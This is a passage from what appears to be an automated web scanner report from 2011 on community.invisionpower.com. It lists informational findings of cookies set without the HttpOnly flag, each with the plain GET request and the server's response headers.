Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:13:58 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__pid__2073960#entry2073960
Content-Length: 0
Connection: close
Content-Type: text/html


11.253. http://community.invisionpower.com/topic/331381-namecheap/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331381-namecheap/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331381-namecheap/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:15:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=bf8bd9172ddd99fba6dc825acd477c74; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:15:37 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331381-namecheap/page__pid__2075893#entry2075893
Content-Length: 0
Connection: close
Content-Type: text/html


11.254. http://community.invisionpower.com/topic/331381-namecheap/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331381-namecheap/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331381-namecheap/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:16:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=245b7539dbc5704d77eb5a6ebb0cf016; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:16:16 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331381-namecheap/page__pid__2075670#entry2075670
Content-Length: 0
Connection: close
Content-Type: text/html


11.255. http://community.invisionpower.com/topic/331383-convert-to-ipb/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331383-convert-to-ipb/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331383-convert-to-ipb/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:13:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=24196c4f07517b6b3194ea90999f226b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:13:42 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331383-convert-to-ipb/page__pid__2075900#entry2075900
Content-Length: 0
Connection: close
Content-Type: text/html


11.256. http://community.invisionpower.com/topic/331383-convert-to-ipb/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331383-convert-to-ipb/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331383-convert-to-ipb/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:13:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=3546dc053438d27f7f8b6d79bcfdf1cd; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:13:47 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331383-convert-to-ipb/page__pid__2075724#entry2075724
Content-Length: 0
Connection: close
Content-Type: text/html


11.257. http://community.invisionpower.com/topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:13:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=bf1258b5c525a99616cbd1a5eda78577; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:13:18 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__pid__2075799#entry2075799
Content-Length: 0
Connection: close
Content-Type: text/html


11.258. http://community.invisionpower.com/topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:13:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=3028af8ffc8a7b34c78b7b8151c25482; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:13:32 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__pid__2075799#entry2075799
Content-Length: 0
Connection: close
Content-Type: text/html


11.259. http://community.invisionpower.com/topic/331399-images/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331399-images/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331399-images/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:16:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ecb3e8bb7732d24b0b75588906670f61; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:16:22 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331399-images/page__pid__2075809#entry2075809
Content-Length: 0
Connection: close
Content-Type: text/html


11.260. http://community.invisionpower.com/topic/331399-images/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331399-images/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331399-images/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:16:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=b254f608966e67c525a60e9054dc8dda; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:16:24 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331399-images/page__pid__2075809#entry2075809
Content-Length: 0
Connection: close
Content-Type: text/html


11.261. http://community.invisionpower.com/topic/331403-custom-home-page/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331403-custom-home-page/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/331403-custom-home-page/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c7d3c1862af307c02059c75a147ed18e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:12:48 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:50 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2NDEwts60MjSyNDOzsDA2s7SuBVwwZ_cHAw%2C%2C; expires=Thu, 02-Feb-2012 23:12:50 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.262. http://community.invisionpower.com/topic/331413-my-ipb-site-is-on-the-front-page-of-huffington-post/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331413-my-ipb-site-is-on-the-front-page-of-huffington-post/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/331413-my-ipb-site-is-on-the-front-page-of-huffington-post/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f43593e58d0103cf0e5573d79527f611; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:12:43 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:46 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2NDE0ts60MjSyNDOzsDA2M7GuBVwwZ_kG_w%2C%2C; expires=Thu, 02-Feb-2012 23:12:46 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 72361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.263. http://community.invisionpower.com/topic/331414-help-please/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331414-help-please/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/331414-help-please/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=14b35b9ace12b54dd45bd6bce19ece15; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:12:35 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:38 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2NDE0sc60MjSyNDOzsDA2NbOuBVwwaAsHAQ%2C%2C; expires=Thu, 02-Feb-2012 23:12:38 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 66922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.264. http://community.invisionpower.com/topic/331420-how-to-upgrade/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331420-how-to-upgrade/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/331420-how-to-upgrade/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:10:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=a546c7b82764f8805a2fcb22ca041904; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:10:43 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:10:46 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2NDEysM60MjSyNDOzsDAyMbGuBVwwZ80G-g%2C%2C; expires=Thu, 02-Feb-2012 23:10:46 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 65012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.265. http://community.invisionpower.com/topic/331420-how-to-upgrade/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331420-how-to-upgrade/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331420-how-to-upgrade/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:11:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=3e4328a56fb1fa0327bebc7f159d2ba8; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:11:26 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331420-how-to-upgrade/page__pid__2075942#entry2075942
Content-Length: 0
Connection: close
Content-Type: text/html


11.266. http://community.invisionpower.com/topic/331420-how-to-upgrade/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331420-how-to-upgrade/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331420-how-to-upgrade/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:11:30 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=9b163bce8c728de0c9ec720f0ff443f8; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:11:30 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331420-how-to-upgrade/page__pid__2075930#entry2075930
Content-Length: 0
Connection: close
Content-Type: text/html


11.267. http://community.invisionpower.com/topic/331421-how-to-upgrade/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331421-how-to-upgrade/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/331421-how-to-upgrade/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=3bfe7532e1f3693372d91e04729e34fb; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:09:18 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:22 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2NDEytM60MjSyNDOzsDA0tbSuBVwwZ-sHXDA%2C; expires=Thu, 02-Feb-2012 23:09:22 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 73248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.268. http://community.invisionpower.com/topic/331421-how-to-upgrade/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331421-how-to-upgrade/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331421-how-to-upgrade/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:09:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=81a5c1b26a75c74c0a409bb0805cb63a; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:09:19 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331421-how-to-upgrade/page__pid__2075938#entry2075938
Content-Length: 0
Connection: close
Content-Type: text/html


11.269. http://community.invisionpower.com/topic/331421-how-to-upgrade/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331421-how-to-upgrade/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331421-how-to-upgrade/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
